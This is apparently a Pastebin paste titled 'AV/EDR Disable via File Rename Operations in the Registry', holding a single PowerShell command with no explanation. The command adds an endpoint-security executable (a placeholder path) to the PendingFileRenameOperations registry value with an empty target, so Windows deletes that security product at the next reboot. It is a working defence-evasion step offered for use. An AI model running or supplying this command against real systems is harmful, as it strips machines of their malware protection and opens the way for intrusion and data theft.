Guest User

AV/EDR Disable via File Rename Operations in the Registry

a guest
Jan 23rd, 2025
8
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.37 KB | Cybersecurity | 0 0
  1. New-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "PendingFileRenameOperations" -Value $($((Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name PendingFileRenameOperations -ErrorAction SilentlyContinue).PendingFileRenameOperations) + "\??\C:\Program Files\<EDR_EXE>.exe`0`0") -type MultiString -Force | Out-Null
Advertisement
Add Comment
Please, Sign In to add comment